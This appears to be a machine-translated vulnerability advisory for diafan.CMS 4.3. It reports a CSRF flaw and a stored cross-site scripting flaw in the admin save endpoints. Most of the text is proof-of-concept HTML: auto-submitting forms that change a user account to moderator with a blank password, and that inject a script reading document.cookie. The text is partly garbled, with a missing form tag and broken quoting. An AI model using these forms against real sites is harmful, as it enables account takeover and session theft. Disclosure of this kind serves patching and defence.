High-Tech
Affected Version: diafan. CMS 4.3
Http://www.diafan.ru/
Vulnerability Type: Cross-Site XSS
Vulnerability Description: CSRF attack. The vulnerability exists in the source where the "http: // host/admin/usersite/save2/" script does not correctly verify the HTTP request.
Successful exploitation of this vulnerability may result in application compromise, cookie-based authentication certificate, leakage or theft of sensitive data modifications.
POC:
<Input type = "hidden" name = "noOut" value = "1"> <input type = "hidden" name = "save_post" value = "1"> <input type = ""hidden" name = "id" value = "2"> <input type = "hidden" name = "fio" value = "first name"> <input type = "hidden" name = "name" value = "userlogin"> <input type = "hidden" name = "password" value = ""> <input type = "hidden" name = "mail" value = "email@example.com"> <input type = "hidden" name = "created" value = "23.12.2010"> <input type = "hidden" name = "act" value = "1 "> <input type =" hidden "name =" moderator "value =" 1 "> <input type =" hidden "name =" language "value =" "> <input type = "hidden" name = "phone" value = "phone"> <input type = "hidden" name = "city" value = "city"> <input type = "hidden" name = "street" value = "street"> <input type = "hidden" name = "home" value = "5"> <input type = "hidden" name = "corps "value =" "> <input type =" hidden "name =" flat "value =" 98 "> </form> <script> document. main. submit (); </script> XSS vulnerability 1:
This vulnerability exists in the XSS Code submitted because "http: // host/admin/site/save2/" has not been strictly filtered. Successful exploitation of this vulnerability may result in application compromise, cookie-based authentication certificate, leakage or theft of sensitive data modifications.
POC:
<Form action =" http://host/admin/site/save2/ "Method =" post "name =" main "enctype =" multipart/form-data "> <input type =" hidden "name =" noOut "value =" 1 "> <input type = "hidden" name = "save_post" value = "1"> <input type = "hidden" name = "id" value = "2"> <input type =" hidden "name =" name "value =" page name "> <input type =" hidden "name =" act "value =" 1 "> <input type =" hidden "name = "actm" value = "1"> <input type = "hidden" name = "title_meta" value = "title"> <input type = "hidden" name = "keywords" value = ""> <input type = "hidden" name = "descr" value = ""> <input type = "hidden" name = "rewrite" value = "sef_url"> <input type = "hidden" name = "addmodule" value = "> <input type =" hidden "name =" parent_id "value =" "> <input type =" hidden ""name =" sort "value =" 2 "> <input type =" hidden "name =" theme "value =" "> <input type =" hidden "name =" othurl "value =" "> <input type =" hidden "name =" text "value = content html"> <script> alert (document. cookie) </script> </form> <script> document. main. submit (); </script>
Fix:
The source of the HTTP request correctly verified by the script.